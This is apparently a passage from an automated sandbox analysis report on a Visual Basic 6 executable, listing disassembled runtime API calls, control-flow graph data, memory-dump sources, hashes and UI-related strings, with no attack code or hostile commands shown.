                                                        • __vbaFreeVar.MSVBVM60 ref: 0041A14B
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 0041A1A0
                                                        • __vbaStrVarMove.MSVBVM60(00000003), ref: 0041A1AA
                                                        • __vbaStrMove.MSVBVM60 ref: 0041A1B5
                                                        • __vbaStrCopy.MSVBVM60 ref: 0041A1C0
                                                        • __vbaFreeStr.MSVBVM60 ref: 0041A1C9
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041A1D2
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 0041A227
                                                        • __vbaStrVarMove.MSVBVM60(00000003), ref: 0041A231
                                                        • __vbaStrMove.MSVBVM60 ref: 0041A23C
                                                        • __vbaStrCopy.MSVBVM60 ref: 0041A247
                                                        • __vbaFreeStr.MSVBVM60 ref: 0041A250
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041A259
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 0041A2AE
                                                        • __vbaStrVarMove.MSVBVM60(00000003), ref: 0041A2B8
                                                        • __vbaStrMove.MSVBVM60 ref: 0041A2C3
                                                        • __vbaStrCopy.MSVBVM60 ref: 0041A2CE
                                                        • __vbaFreeStr.MSVBVM60 ref: 0041A2D7
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041A2E0
                                                        • __vbaNew2.MSVBVM60(004104D8,0042AA34), ref: 0041A2F9
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004104C8,00000038,?,?,?,?,?,?,?,00000003), ref: 0041A36D
                                                        • __vbaNew2.MSVBVM60(004104D8,0042AA34,?,?,?,?,?,?,?,00000003), ref: 0041A386
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004104C8,00000038,?,?,?,?,?,?,?,?), ref: 0041A414
                                                        • __vbaVar2Vec.MSVBVM60(?,00000003,?,?,?,?,?,?,?,?), ref: 0041A422
                                                        • __vbaRefVarAry.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0041A42C
                                                        • __vbaUbound.MSVBVM60(00000001,?,?,?,?,?,?,?,?,?), ref: 0041A437
                                                        • __vbaErase.MSVBVM60(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?), ref: 0041A455
                                                        • __vbaAryMove.MSVBVM60(0042A030,00000004,?,?,?,?,?,?,?,?), ref: 0041A473
                                                        • __vbaFreeVarList.MSVBVM60(00000002,?,00000003,?,?,?,?,?,?,?,?), ref: 0041A483
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 0041A4E0
                                                        • __vbaStrVarMove.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A4EA
                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A4F5
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A500
                                                        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A509
                                                        • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A512
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 0041A565
                                                        • __vbaBoolVar.MSVBVM60(00000003), ref: 0041A56F
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041A57C
                                                          • Part of subcall function 0041D540: __vbaAryConstruct2.MSVBVM60(?,00411224,00000011,?,00401610,?), ref: 0041D57F
                                                          • Part of subcall function 0041D540: __vbaGenerateBoundsError.MSVBVM60 ref: 0041D5A0
                                                          • Part of subcall function 0041D540: __vbaGenerateBoundsError.MSVBVM60 ref: 0041D5E7
                                                          • Part of subcall function 0041D540: __vbaGenerateBoundsError.MSVBVM60 ref: 0041D5EF
                                                          • Part of subcall function 0041D540: __vbaGenerateBoundsError.MSVBVM60 ref: 0041D5FF
                                                          • Part of subcall function 0041D540: __vbaUbound.MSVBVM60(00000001), ref: 0041D62C
                                                          • Part of subcall function 0041D540: __vbaGenerateBoundsError.MSVBVM60 ref: 0041D667
                                                          • Part of subcall function 0041BC40: __vbaUbound.MSVBVM60(00000001,00000000,?,00401610,?), ref: 0041BCAE
                                                          • Part of subcall function 0041BC40: __vbaGenerateBoundsError.MSVBVM60 ref: 0041BCF9
                                                          • Part of subcall function 0041BC40: #632.MSVBVM60(?,00004008,00000000,00000002), ref: 0041BD46
                                                          • Part of subcall function 0041BC40: __vbaStrVarVal.MSVBVM60(?,?), ref: 0041BD54
                                                          • Part of subcall function 0041BC40: #516.MSVBVM60(00000000), ref: 0041BD5B
                                                          • Part of subcall function 0041BC40: __vbaUI1I2.MSVBVM60 ref: 0041BD63
                                                          • Part of subcall function 0041BC40: __vbaFreeStr.MSVBVM60 ref: 0041BD6F
                                                          • Part of subcall function 0041BC40: __vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 0041BD7F
                                                          • Part of subcall function 0041BC40: __vbaGenerateBoundsError.MSVBVM60 ref: 0041BD05
                                                          • Part of subcall function 0041BC40: __vbaGenerateBoundsError.MSVBVM60 ref: 0041BD9F
                                                          • Part of subcall function 0041BC40: #608.MSVBVM60(00000002,?), ref: 0041BDE0
                                                          • Part of subcall function 0041BC40: __vbaInStrVar.MSVBVM60(?,00000000,00000002,00000008,00000001), ref: 0041BDF8
                                                          • Part of subcall function 0041BC40: __vbaI2Var.MSVBVM60(00000000), ref: 0041BDFF
                                                          • Part of subcall function 0041BC40: __vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 0041BE11
                                                          • Part of subcall function 0041BC40: #632.MSVBVM60(?,00000008,?,00000002), ref: 0041BE62
                                                          • Part of subcall function 0041BC40: __vbaStrVarMove.MSVBVM60(?,?,00000002), ref: 0041BE6C
                                                          • Part of subcall function 0041BC40: __vbaStrMove.MSVBVM60(?,00000002), ref: 0041BE77
                                                          • Part of subcall function 0041BC40: __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,00000002), ref: 0041BE87
                                                          • Part of subcall function 0041BC40: #617.MSVBVM60(00000002,00004008,00000000), ref: 0041BEBC
                                                          • Part of subcall function 0041BC40: #608.MSVBVM60(?,?), ref: 0041BEC7
                                                          • Part of subcall function 0041BC40: __vbaGenerateBoundsError.MSVBVM60 ref: 0041BDAB
                                                          • Part of subcall function 0041BC40: #632.MSVBVM60(?,?,00000000,?), ref: 0041BF22
                                                          • Part of subcall function 0041BC40: __vbaVarCat.MSVBVM60(?,?,00000002), ref: 0041BF3A
                                                          • Part of subcall function 0041BC40: __vbaVarCat.MSVBVM60(?,00000008,00000000), ref: 0041BF48
                                                          • Part of subcall function 0041BC40: __vbaVarCat.MSVBVM60(?,?,00000000), ref: 0041BF59
                                                          • Part of subcall function 0041BC40: __vbaStrVarMove.MSVBVM60(00000000), ref: 0041BF5C
                                                          • Part of subcall function 0041BC40: __vbaStrMove.MSVBVM60 ref: 0041BF69
                                                          • Part of subcall function 0041BC40: __vbaFreeVarList.MSVBVM60(00000007,00000002,?,?,0000000A,?,?,?), ref: 0041BF93
                                                          • Part of subcall function 0041BC40: __vbaFreeStr.MSVBVM60(0041BFFB), ref: 0041BFF4
                                                          • Part of subcall function 004229F0: __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,00000019,72A0C33A), ref: 00422AB1
                                                          • Part of subcall function 004229F0: __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?), ref: 00422B12
                                                          • Part of subcall function 004229F0: __vbaVarTstEq.MSVBVM60(?,?,00001BBC), ref: 00422B78
                                                          • Part of subcall function 004229F0: __vbaI2Var.MSVBVM60(?), ref: 00422B87
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C,?,?,0042A030,0042A030), ref: 0041A601
                                                        • __vbaBoolVar.MSVBVM60(00000003,?,?,0042A030,0042A030), ref: 0041A60B
                                                        • __vbaFreeVar.MSVBVM60(?,?,0042A030,0042A030), ref: 0041A618
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C,?,?,?,?,?,?,?,0042A030), ref: 0041A66A
                                                        • __vbaBoolVar.MSVBVM60(00000003,?,?,?,?,?,?,?,0042A030), ref: 0041A674
                                                        • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,0042A030), ref: 0041A681
                                                        • __vbaFreeVarList.MSVBVM60(00000002,00000003,?,00422E90,00000000,?,00000003,?,?,?,?,?,?,?,0042A030), ref: 0041A6DF
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 0041A728
                                                        • __vbaStrVarMove.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042A030), ref: 0041A732
                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042A030), ref: 0041A73D
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042A030), ref: 0041A748
                                                        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042A030), ref: 0041A751
                                                        • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042A030), ref: 0041A75A
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041A775
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,0000009C), ref: 0041A79A
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042A030), ref: 0041A7A3
                                                        • __vbaAryLock.MSVBVM60(?,00588598), ref: 0041A7BC
                                                        • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042A030), ref: 0041A7DB
                                                        • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042A030), ref: 0041A7E8
                                                        • __vbaAryUnlock.MSVBVM60(?,?), ref: 0041A800
                                                        • __vbaNew2.MSVBVM60(004104D8,0042AA34), ref: 0041A819
                                                        • __vbaNew2.MSVBVM60(0040E078,0042A064), ref: 0041A838
                                                        • __vbaObjSetAddref.MSVBVM60(?,00000000), ref: 0041A84B
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,027EF774,004104C8,0000000C), ref: 0041A865
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042A030), ref: 0041A86E
                                                        • __vbaAryDestruct.MSVBVM60(00000000,?,0041A8EF), ref: 0041A8DF
                                                        • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042A030), ref: 0041A8E8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Free$CheckHresult$Move$Error$BoundsGenerate$List$Bool$Copy$New2$#632Ubound$#608System$#516#617AddrefCastConstruct2DestructEraseLockUnlockVar2
                                                        • String ID: &H1000$&H40$Alignment$ArrowAsKeyTab$AutoHScroll$AutoSelText$AutoVScroll$BackColor$BorderStyle$ButtonBackColor$ButtonStyle$CaseType$ControlType$CustomFormat$Enabled$EnterAsKeyTab$Font$ForeColor$FormatText$MaxLen$Multiline$PasswordChar$ScrollBars$Text$ToolTipText$ValidChar$eXTEditBox1
                                                        • API String ID: 1849406520-4125845578
                                                        • Opcode ID: 3bc6dfc64b4e67dec9f3331baed095d0177df28797fd896cbf12892b224acf7a
                                                        • Instruction ID: 14e9e91084dcc7f14718d377a57e2a393148882e012712f234efa37f7e0d6433
                                                        • Opcode Fuzzy Hash: 3bc6dfc64b4e67dec9f3331baed095d0177df28797fd896cbf12892b224acf7a
                                                        • Instruction Fuzzy Hash: 2EE24E70A00309AFDB14DFA4C988EDEBBB8FF48704F108569E549E7291EB749986CF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 232 415d80-415dd7 234 415dd9-415de5 call 40fb74 __vbaSetSystemError 232->234 235 415de8-415ded 232->235 234->235 237 415def-415dfb call 40fb74 __vbaSetSystemError 235->237 238 415dfe-415e0a 235->238 237->238 241 415e10-415e17 238->241 242 415ea4 238->242 245 415e19-415e1c 241->245 246 415e1e-415e2d 241->246 243 415ea7-415eaa __vbaStrCopy 242->243 247 415eb0-415ec1 __vbaI2I4 243->247 248 415e33-415e87 #525 __vbaStrMove __vbaStrToAnsi call 40f5dc __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 245->248 246->248 249 415ec3-415ecd __vbaI2I4 247->249 250 415eea-415ef5 __vbaI2I4 247->250 261 415e89-415e9b #616 __vbaStrMove 248->261 262 415e9d-415ea2 248->262 252 415ed6-415ee0 __vbaI2I4 249->252 253 415ecf-415ed4 249->253 254 415f20-415f2a __vbaI2I4 250->254 255 415ef7-415f1c __vbaObjSet 250->255 252->250 260 415ee2-415ee5 252->260 259 415ee7 253->259 257 415f7a-415f84 __vbaI2I4 254->257 258 415f2c-415f51 __vbaObjSet 254->258 277 415f65-415f75 __vbaFreeObj 255->277 278 415f1e 255->278 263 415fd4-415fde __vbaI2I4 257->263 264 415f86-415fab __vbaObjSet 257->264 258->277 279 415f53-415f5f __vbaHresultCheckObj 258->279 259->250 260->259 261->247 262->243 266 415fe0-416005 __vbaObjSet 263->266 267 41602b-416035 __vbaI2I4 263->267 287 415fad-415fb9 __vbaHresultCheckObj 264->287 288 415fbf-415fcf __vbaFreeObj 264->288 292 416007-416013 __vbaHresultCheckObj 266->292 293 416019-416029 __vbaFreeObj 266->293 269 416080-416087 267->269 270 416037-41605c __vbaObjSet 267->270 273 416089 269->273 274 41608d-4160a1 269->274 300 416070-416079 __vbaFreeObj 270->300 301 41605e-41606a __vbaHresultCheckObj 270->301 273->274 280 4160a7-4160b1 __vbaI2I4 274->280 281 41614d-41615c 274->281 277->269 278->279 279->277 284 4160b3-4160bb 280->284 285 4160bd-4160c7 __vbaI2I4 280->285 298 416170-416175 281->298 299 41615e-41616a __vbaHresultCheckObj 281->299 289 4160e7 284->289 290 4160d3-4160dd __vbaI2I4 285->290 291 4160c9-4160d1 285->291 287->288 288->269 296 4160ea-4160f9 289->296 290->296 297 4160df-4160e2 290->297 291->289 292->293 293->269 310 4160fb-416107 __vbaHresultCheckObj 296->310 311 41610d-416112 296->311 297->289 302 416177-41617a 298->302 303 41617f-41618d __vbaI2I4 298->303 299->298 300->269 301->300 305 41617c 302->305 306 416198-4161a3 __vbaI2I4 303->306 307 41618f-416195 303->307 305->303 308 4161a5-4161ca __vbaObjSet 306->308 309 4161ec-4161f6 __vbaI2I4 306->309 307->306 327 4161cc-4161d8 __vbaHresultCheckObj 308->327 328 4161de-4161e7 __vbaFreeObj 308->328 312 4162fc-416306 __vbaI2I4 309->312 313 4161fc-416223 __vbaObjSet 309->313 310->311 314 416114-416119 311->314 315 41611c-41612b 311->315 316 41630c-416333 __vbaObjSet 312->316 317 41647e-4164a5 __vbaObjSet 312->317 332 416225-416231 __vbaHresultCheckObj 313->332 333 416237-416289 call 41006c __vbaSetSystemError __vbaFreeObj __vbaObjSet 313->333 314->315 322 41612d-416139 __vbaHresultCheckObj 315->322 323 41613f-416144 315->323 336 416335-416341 __vbaHresultCheckObj 316->336 337 416347-416399 call 41006c __vbaSetSystemError __vbaFreeObj __vbaObjSet 316->337 334 4164a7-4164b3 __vbaHresultCheckObj 317->334 335 4164b9-41650b call 41006c __vbaSetSystemError __vbaFreeObj __vbaObjSet 317->335 322->323 323->303 326 416146-41614b 323->326 326->305 327->328 328->317 332->333 348 41628b-416297 __vbaHresultCheckObj 333->348 349 41629d-4162a4 333->349 334->335 354 41650d-416519 __vbaHresultCheckObj 335->354 355 41651f-416526 335->355 336->337 356 41639b-4163a7 __vbaHresultCheckObj 337->356 357 4163ad-4163b4 337->357 348->349 352 4162b6-4162ca 349->352 353 4162a6-4162b0 __vbaNew2 349->353 364 4162db-4162f1 352->364 365 4162cc-4162d5 __vbaHresultCheckObj 352->365 353->352 354->355 360 416538-41654c 355->360 361 416528-416532 __vbaNew2 355->361 356->357 358 4163c6-4163da 357->358 359 4163b6-4163c0 __vbaNew2 357->359 367 4163eb-416401 358->367 368 4163dc-4163e5 __vbaHresultCheckObj 358->368 359->358 369 41655d-416573 360->369 370 41654e-416557 __vbaHresultCheckObj 360->370 361->360 374 416415-41647b __vbaStrToAnsi call 40fb2c __vbaSetSystemError __vbaFreeStr __vbaFreeObjList 364->374 375 4162f7 364->375 365->364 367->374 376 416403-41640f __vbaHresultCheckObj 367->376 368->367 377 416575-416581 __vbaHresultCheckObj 369->377 378 416587-4165f6 __vbaStrToAnsi call 40fb2c __vbaSetSystemError __vbaFreeStr __vbaFreeObjList 369->378 370->369 374->317 375->376 376->374 377->378 383 416752 378->383 384 4165fc-416625 __vbaObjSet 378->384 385 416758-41677a __vbaObjSet 383->385 390 416627-416633 __vbaHresultCheckObj 384->390 391 416639-416673 __vbaCastObj __vbaObjSet __vbaFreeObjList 384->391 392 41678b-4167a1 385->392 393 41677c-416785 __vbaHresultCheckObj 385->393 390->391 395 416675-416681 __vbaHresultCheckObj 391->395 396 416687-4166a7 call 40f5dc __vbaSetSystemError 391->396 399 4167a3-4167af __vbaHresultCheckObj 392->399 400 4167b5-4167ec __vbaFreeObjList __vbaObjSet 392->400 393->392 395->396 402 4166a9-4166bd call 40f5dc __vbaSetSystemError 396->402 403 4166bf-416700 __vbaStrToAnsi call 40f5dc __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr __vbaLenBstr 396->403 399->400 410 4167fd-416813 400->410 411 4167ee-4167f7 __vbaHresultCheckObj 400->411 402->403 412 416702-416724 #516 403->412 413 416726-41673b 403->413 417 416815-416821 __vbaHresultCheckObj 410->417 418 416827-41686c __vbaFreeObjList __vbaFreeObj __vbaFreeStr 410->418 411->410 414 41673c-416749 call 40f5dc __vbaSetSystemError call 40fbb8 412->414 413->414 422 41674e-416750 ShowWindow 414->422 417->418 422->385
                                                        APIs
                                                        • __vbaSetSystemError.MSVBVM60(?), ref: 00415DDF
                                                        • __vbaSetSystemError.MSVBVM60(?), ref: 00415DF5
                                                        • #525.MSVBVM60(?), ref: 00415E34
                                                        • __vbaStrMove.MSVBVM60 ref: 00415E45
                                                        • __vbaStrToAnsi.MSVBVM60(?,?), ref: 00415E4F
                                                        • __vbaSetSystemError.MSVBVM60(?,0000000D,?,00000000), ref: 00415E65
                                                        • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00415E73
                                                        • __vbaFreeStr.MSVBVM60 ref: 00415E7F
                                                        • #616.MSVBVM60(?,?), ref: 00415E8E
                                                        • __vbaStrMove.MSVBVM60 ref: 00415E99
                                                        • __vbaStrCopy.MSVBVM60 ref: 00415EAA
                                                        • __vbaI2I4.MSVBVM60 ref: 00415EBC
                                                        • __vbaI2I4.MSVBVM60 ref: 00415EC8
                                                        • __vbaI2I4.MSVBVM60 ref: 00415EDB
                                                        • __vbaI2I4.MSVBVM60 ref: 00415EF0
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00415F05
                                                        • __vbaI2I4.MSVBVM60 ref: 00415F25
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00415F3A
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,0000016C), ref: 00415F5F
                                                        • __vbaFreeObj.MSVBVM60 ref: 00415F68
                                                        • __vbaI2I4.MSVBVM60 ref: 00415F7F
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00415F94
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,0000016C), ref: 00415FB9
                                                        • __vbaFreeObj.MSVBVM60 ref: 00415FC2
                                                        • __vbaI2I4.MSVBVM60 ref: 00415FD9
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00415FEE
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,0000016C), ref: 00416013
                                                        • __vbaFreeObj.MSVBVM60 ref: 0041601C
                                                        • __vbaI2I4.MSVBVM60 ref: 00416030
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00416045
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,0000016C), ref: 0041606A
                                                        • __vbaFreeObj.MSVBVM60 ref: 00416073
                                                        • __vbaI2I4.MSVBVM60 ref: 004160AC
                                                        • __vbaI2I4.MSVBVM60 ref: 004160C2
                                                        • __vbaI2I4.MSVBVM60 ref: 004160D8
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040F460,000007E0), ref: 00416107
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040F460,000007E8), ref: 00416139
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040F460,000007E0), ref: 0041616A
                                                        • __vbaI2I4.MSVBVM60 ref: 00416188
                                                        • __vbaI2I4.MSVBVM60 ref: 0041619E
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 004161B3
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,0000009C), ref: 004161D8
                                                        • __vbaFreeObj.MSVBVM60 ref: 004161E1
                                                        • __vbaI2I4.MSVBVM60 ref: 004161F1
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041620A
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,000001C0), ref: 00416231
                                                        • __vbaSetSystemError.MSVBVM60(?,?), ref: 0041624A
                                                        • __vbaFreeObj.MSVBVM60 ref: 0041625C
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00416270
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,000001C0), ref: 00416297
                                                        • __vbaNew2.MSVBVM60(004104D8,0042AA34), ref: 004162B0
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,027EF774,004104C8,00000014), ref: 004162D5
                                                        • __vbaI2I4.MSVBVM60 ref: 00416301
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041631A
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,000001C0), ref: 00416341
                                                        • __vbaSetSystemError.MSVBVM60(?,?), ref: 0041635A
                                                        • __vbaFreeObj.MSVBVM60 ref: 0041636C
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00416380
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,000001C0), ref: 004163A7
                                                        • __vbaNew2.MSVBVM60(004104D8,0042AA34), ref: 004163C0
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,027EF774,004104C8,00000014), ref: 004163E5
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004104E8,00000100), ref: 0041640F
                                                        • __vbaStrToAnsi.MSVBVM60(?,Button,00000000,5000000B,?,?,?,?,?,00000000,?,00000000), ref: 00416449
                                                        • __vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 00416459
                                                        • __vbaFreeStr.MSVBVM60 ref: 00416465
                                                        • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00416475
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041648C
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,000001C0), ref: 004164B3
                                                        • __vbaSetSystemError.MSVBVM60(?,?), ref: 004164CC
                                                        • __vbaFreeObj.MSVBVM60 ref: 004164DE
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 004164F2
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,000001C0), ref: 00416519
                                                        • __vbaNew2.MSVBVM60(004104D8,0042AA34), ref: 00416532
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,027EF774,004104C8,00000014), ref: 00416557
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004104E8,00000100), ref: 00416581
                                                        • __vbaStrToAnsi.MSVBVM60(?,Edit,00000000,54010000,?,00000000,?,?,?,00000000,?,00000000), ref: 004165BA
                                                        • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 004165CC
                                                        • __vbaFreeStr.MSVBVM60 ref: 004165D8
                                                        • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004165E8
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00416610
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,00000210), ref: 00416633
                                                        • __vbaCastObj.MSVBVM60(?,00410468), ref: 00416642
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041664D
                                                        • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00416659
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410468,0000004C), ref: 00416681
                                                        • __vbaSetSystemError.MSVBVM60(?,00000030,?,00000001), ref: 0041669E
                                                        • __vbaSetSystemError.MSVBVM60(?,000000C5,?,00000000), ref: 004166BD
                                                        • __vbaStrToAnsi.MSVBVM60(?,?), ref: 004166C7
                                                        • __vbaSetSystemError.MSVBVM60(?,0000000C,00000000,00000000), ref: 004166DB
                                                        • __vbaStrToUnicode.MSVBVM60(?,?), ref: 004166E5
                                                        • __vbaFreeStr.MSVBVM60(?,00000000), ref: 004166EE
                                                        • __vbaLenBstr.MSVBVM60(?), ref: 004166F8
                                                        • #516.MSVBVM60(?), ref: 00416706
                                                        • __vbaSetSystemError.MSVBVM60(?,000000CC,00000000,?), ref: 00416741
                                                        • ShowWindow.USER32(?,00000005), ref: 0041674E
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00416766
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004104F8,00000040), ref: 00416785
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410414,000001C0), ref: 004167AF
                                                        • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004167C5
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 004167D8
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004104F8,00000040), ref: 004167F7
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410414,000001C0), ref: 00416821
                                                        • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00416831
                                                        • __vbaFreeObj.MSVBVM60(0041686D), ref: 0041685D
                                                        • __vbaFreeStr.MSVBVM60 ref: 00416866
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckHresult$Free$ErrorSystem$List$Ansi$New2$MoveUnicode$#516#525#616BstrCastCopyShowWindow
                                                        • String ID: Button$Edit
                                                        • API String ID: 47084911-194258807
                                                        • Opcode ID: f82bf783298826b457ba641c5b1a280949302d1d19247fe771af235a0b4fd448
                                                        • Instruction ID: c2fe4f57df809c9c010dc1cdbf862f63a0087c7c8e9a089793c4f6b94b841b24
                                                        • Opcode Fuzzy Hash: f82bf783298826b457ba641c5b1a280949302d1d19247fe771af235a0b4fd448
                                                        • Instruction Fuzzy Hash: F0725E70A00604AFD7149BA4DD48FEFB7B8FF48705F104529F646E72A1DB74A886CB68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 004240C0: __vbaVarVargNofree.MSVBVM60(?,?,00424414,?), ref: 004240D3
                                                          • Part of subcall function 004240C0: __vbaI4Var.MSVBVM60(00000000,?,?,00424414,?), ref: 004240DA
                                                        • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,00000019,72A0C33A), ref: 00422AB1
                                                        • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?), ref: 00422B12
                                                        • __vbaVarTstEq.MSVBVM60(?,?,00001BBC), ref: 00422B78
                                                        • __vbaI2Var.MSVBVM60(?), ref: 00422B87
                                                        • __vbaStrMove.MSVBVM60(00000000), ref: 00422B98
                                                        • __vbaVarTstEq.MSVBVM60(00008002,?), ref: 00422BBF
                                                        • __vbaSetSystemError.MSVBVM60(?), ref: 00422BFE
                                                        • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,00001C1F), ref: 00422C3C
                                                        • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?), ref: 00422CEC
                                                        • __vbaSetSystemError.MSVBVM60(00000000,?,00000004), ref: 00422D14
